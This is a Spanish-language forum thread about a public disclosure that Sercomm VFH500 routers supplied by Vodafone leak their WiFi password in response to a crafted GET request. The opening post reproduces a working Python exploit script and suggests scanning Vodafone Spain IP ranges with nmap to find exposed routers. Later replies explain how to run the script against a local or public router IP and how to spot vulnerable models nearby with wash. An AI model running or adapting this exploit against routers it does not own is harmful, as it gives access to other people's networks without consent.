Sercomm VFH500 de Vodafone regala contraseñas WiFi

kcdtv · 07-01-2022 12:51:22

Contraseñas WiFi accesibles mediante petición GET en Sercomm VFH500 (Vodafone)

¿Papá Noel vodafone se pasó con la nieve de noche vieja?
No sabemos,
Lo que sabemos es que para empezar con alegría y fuerza este nuevo año; Daniel Monzón - aka stark0de - publicó un full disclosure el primer de enero.
Lo primero es saludar este esfuerzo: Personalmente no estaba en estado de publicar lo que sea aquel día.
Por lo visto Papá noel vodfaoine tampoco tongue

La descripción de la brecha de seguridad es esta:

stark0de escribió:

# The WiFi access point password gets disclosed just by performing a GET request with certain headers

Debemos poner ciertas cabeceras (ver justo abajo) en una petición GET hacía la interfaz (http://192.168.0.1/activation.htmlxxx) y la contraseña wifi cae.
Tenemos a un exploit escrito con python dónde podéis ver en detalles las dicha cabeceras

import requests
import sys
import json
if len(sys.argv) != 2:
print("Usage: python3 vodafone-pass-disclose.py http://IP")
sys.exit()
url = sys.argv[1]+"/data/activation.json"
cookies = {"pageid": "129"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101

Firefox/78.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-
Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-
With": "XMLHttpRequest", "Connection": "close", "Referer":"http://192.168.0.1/activation.html?mode=basic&lang=en-es&step=129"}
Vodafone H-500-s 3.5.10 WiFi Password Disclosure
req=requests.get(url, headers=headers, cookies=cookies)
result=json.loads(req.text)[3].get("wifi_password")
print("[+] The wifi password is: "+result)

Se necesita acceso a la interfaz de configuración.
Y es justamente una especialidad de la casa, la marca del V: Vodafone tiene a bastante routers con el control remoto habilitado.
Hipotéticamente, si uno se pone en serio con nmap y este exploit en los rangos de IP Vodafone España, seguro que sacaría algo.
Este modelo se distribuye un poco por todos lados ya que tiene wifi ac y Gigabit, vale para fibra desde 100Mbps hasta 1Gps.
Según veo nos puede tocar con cualquier contrato "Vodafone One, fibra + SIM"
Y por ultimo, para descartar las fake news, sí que Papa Noel trabaja para Vodafone, por esto tiene un vestido rojo.

fuentes

Vodafone H-500-s 3.5.10 WiFi Password Disclosure by Daniel Monzon (aka stark0de) @ Packet Storm

wifiyeah · 09-01-2022 18:33:47

Hola feliz año y bienvenido al foro xD

perdona te escribo a ver si me puedes aclarar unas dudas.

me gustaria preguntarte cual es el comando exacto para lanzar el exploit si puede ser,
se debe lanzar bajo python supongo lo digo por lo que veo en el codigo supongo que python3
creo que voy perdido no se tendria que lanzar contra un BSSID o un ESSID???
como seria desde consola,
tu lo has probado??
funciona?

y cuales son esas ciertas cabezeras?
suena a misterio como que ciertas?
las que salen en el codigo debajo de user agent y no hay que poner mas ni cambiar?

en Packet Storm nunca explican nada y el Daniel Monzon aka stark0de tampoco.
algun sitio con mas info sobre este exploit?

gracias por seguir en el foro desparecido y feliz año nuevo again y por muchos mas

kcdtv · 10-01-2022 15:48:23

¡Feliz año a ti también! biere
Y [email protected] @ wifi-libre wink

No he podido probar el exploit por falta de VFH500 a mano,
Tampoco he visto algo especial en estas "ciertas" cabeceras... He traducido certain por ciertas pero igualmente no es exactamente el mismo significado en inglés. Lo más llamativo es la huella "Referer" que apunta a la "activation.html", ahí está el agujero de seguridad ,
Tampoco he encontrado algo más detallado que en Packet Storm, En Packet Storm solo publican lo que les das, nunca comentan o explican, creo de hecho que Packet storm es un tío solo...

Por lo de ejecutar el script depende de la configuración de tu sistema .
De costumbre se puede hacer indicando el lenguaje seguido por la ruta del script.

python /ruta/script.py

Es posible que tengas que entrar python3 en lugar de python.
Si no te gusta puedes instalar el paquete «python-is-python3» (deb) o crear unos aliases.

[email protected]:~$ python

Orden «python» no encontrada. Quizá quiso decir:

  la orden «python3» del paquete deb «python3»
  la orden «python» del paquete deb «python-is-python3»

[email protected]:~$ python3
Python 3.8.10 (default, Nov 26 2021, 20:14:08) 
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

Para poder ejecutar el script debes "tabular" el código, es mandatario en python,
Los headers deben estar en una sola linea y debes poner un tab en el primer print justo despuès la declaración de la condición if
De lo contrario tendrás errores "Indentation" y otro "End of Line".

No hace falta ni bSSID ni eSSID, no se necesita esta info.
Lo que se hace es devolverte en consola el resultado de la variable result

result=json.loads(req.text)[3].get("wifi_password")

Parece que se trata de pillar la cuarta coincidencia con la expresión regular "wifi password" y que está en formato *json,
O algo por el estilo...
Quizá se podría jugar con el indice o probar otras cosas y sacar más info útil.

Así que lo único que debes indicar es la IP (la del router) para mandar correctamente tu petición,

[email protected]:~$ python3 '/home/kcdtv/Escritorio/text.py' 
Usage: python3 vodafone-pass-disclose.py http://IP

O sea algo así

python3 '/home/kcdtv/Escritorio/text.py' http://192.168.1.1

O bien pones la IP publica, debería funcionar también si está habilitado el acceso remoto.

wifiyeah · 10-01-2022 23:17:31

Yo tampoco he encontrado ninguno
busque en wash con sercomm y con vodafone y vodafone parece que solo pone broadcom y algun realtek y por sercomm nada de nada y lo deje como media hora haciendo otras cosas pero nada,
con VFH500 no busque pero sera lo mismo supongo.

kcdtv escribió:

Para poder ejecutar el script debes tabular el código, es mandatario en python,
Los headers deben estar en una sola linea y debes tabular el primer print justo despuès la declaración de la condición if
De lo contrario tendrás errores "Identation" y otro "End of Line".
No hace falta ni bSSID ni eSSID, no se necesita esta info.
Lo que se hace es devolverte en consola el resultado de la variable result
result=json.loads(req.text)[3].get("wifi_password")
Parece que se trata de pillar la cuarta coincidencia con la expresión regular "wifi password" y que está en formato *json,
O algo por el estilo...
Quizá se podría jugar con el indice o probar otras cosas y sacar más info útil.

Aqui me pierdo completamente roll
yo no tabulo nada lo ejecuto y me dice lo de siempre:
"Usage: python3 vodafone-pass-disclose.py http://IP"
ningun error sobre "Identation" o "End of Line"
bueno esto se parece a Identation,
IndentationError: expected an indented block
es mas,
no se ni lo que significa tabular el codigo en python tongue
ponerle tabulados al texto??
ya me callo tongue

pero si apuntas a 192.168.1.1 desde tu maquina se supone que estas dentro de la red o sea se supone que ya tienes la clave,
eso no lo acabo de entender apuntar a 192.168.1.1 sin estar en una red

gracias por la ayuda.

kcdtv · 11-01-2022 15:57:52

con sercomm y con vodafone y vodafone parece que solo pone broadcom y algun realtek y por sercomm nada de nada

Sobre el manejo de wash:
Sercomm es el fabricante del router y Broadcom o Realtek son los fabricantes del chipset wifi.
Debes usar la opción -j para poder ver el fabricante del router, para ver los parámetros extendidos de las respuestas probes.
Es bueno combinar con -n 100, más lento pero más eficiente.
De memoria, he visto a routers Vodafone/Sercomm con chipset Realtek o Broadcomm en banda 2.4Ghz y Broadcom o Quantenna en banda 5Ghz.
Hay varios modelos...
Puedes también usar wash sin la opción -j, lo haces en pipe con grep y redactas tus expresiones regulares gracias a la tabla OUI. Pero así no tendrás el modelo.

bueno esto se parece a Identation,
IndentationError: expected an indented block

Indentación es efectivamente un anglicismo, según la RAE se debe decir el "sangrado" del código.
Pero creo que me voy a quedar con el anglicismo, la palabra es mucho más practica.
Puedes "indentar el código". En lugar de "hacer el sangrado del código". O hablar de un código "mal indentado"...
Por lo de usar <TAB> en lugar de los espacios para indentar los códigos, lo digo para tu futuro en la Sillicon Valley, es muuuuuuy importante.

pero si apuntas a 192.168.1.1 desde tu maquina se supone que estas dentro de la red o sea se supone que ya tienes la clave,
eso no lo acabo de entender apuntar a 192.168.1.1 sin estar en una red

Ahora entiendo lo de wash,... [email protected] hacen hacking ético y tú haces hacking cuántico big_smile ,,, Es cómo el Gato de Schrödinger: Estar en la red y no estar en la red al mismo tiempo.

wifiyeah · 11-01-2022 23:20:05

si asi lo estaba haciendo
wash -i mon0 | grep vodafone -a
probare con -j a ver si veo algun VFH500
o sea la tabla oui solo vale para chipets

tabular el texto quiere decir poner tabulados en vez de espacio,
curioso...

quien hace caso a la RAE xD

perdido voy perdido vengo

si veo algo ya lo contare.

kcdtv · 12-01-2022 15:50:00

Por lo visto tenemos a 3 modelos Sercomm / vodafone:

Sercomm VFH500-S
Sercomm FG824CD
Sercomm VOX 2.5 avanzado DSL

En los tags extendidos de wash hay redes sercomm vodafone que sueltan

"wps_manufacturer" : "SERCOMM", "wps_model_name" : "Vodafone-H-500-s", "wps_model_number" : "Vodafone-H-500-s", "wps_device_name" : "Vodafone-H-500

Sale Vodafone-H-500-s y corresponde en los nombres en la versión del firmware que podemos ver en esta captura:

Esto serán los del modelo afectados,: Sercomm VFH500-S con firmware Vodafone-H-500-s

Por probar, lo he intentado en un Sercomm FG824CD, y a primera vista no tenemos a la misma brecha...
La versión del firmware es distinta cómo pueden ver

En sus probes no sale Sercomn o el modelo, solo salen los tags WPS de Ralink.

Sobre el ultimo modelo citado más arriba, sale el modelo en los parámetros extendidos de las respuestas Probes, son fáciles de identificar (y probablemente a descartar).
Añado el hilo twitter del autor del exploit,

wifiyeah · 15-01-2022 11:43:42

Parecia mas facil al principio pero esta dificil,
esta dificil hasta probar todavia no localize ninguno,
gracias por la ayuda.

kcdtv · 17-01-2022 18:58:18

Por mi zona vodafone no está de moda. Veo más Orange o Másmovil y, la mayoría, Movistar. Dentro de las nueves redes vodafone que van apareciendo, muchas veces son de su sucursal "low cost" lowi,
He visto que "Daniel Monzón - aka stark0de" tiene una web: Stark0de
...Pero no la actualizó desde octubre 2020 y no hay nada sobre esta brecha de seguridad,
Aquí esta su github; stark0de

En los modelos sercom vodafone hay también este que debemos tener en cuenta:

Sercomm RHG3006

Es el más moderno con compatibilidad ax (wifi6)
No sé qué pinta tienen sus Probes, nunca lo he visto: Estos son todos los routers que instala Vodafone y sus características

Tema	Respuestas	Vistas	Ultimo mensaje
A possible improvement to the WPS PBC hack por mooooon	0	22	Hoy 02:31:26 por mooooon
Crack llave WPA Arris TG2482A(y otros modelos) por HumbertoML	6	9654	18-01-2022 16:40:19 por kcdtv
Sercomm VFH500 de Vodafone regala contraseñas WiFi por kcdtv	8	493	17-01-2022 18:58:18 por kcdtv
¿La antena influye en el consumo o potencia total? por skan	3	179	11-01-2022 17:02:22 por kcdtv
Belgrano México otro éxito del «Proyecto Belgrano» por Miguelillo0	1	281	04-01-2022 15:55:45 por kcdtv

Foro Wifi-libre.com

Anuncio

#1 07-01-2022 12:51:22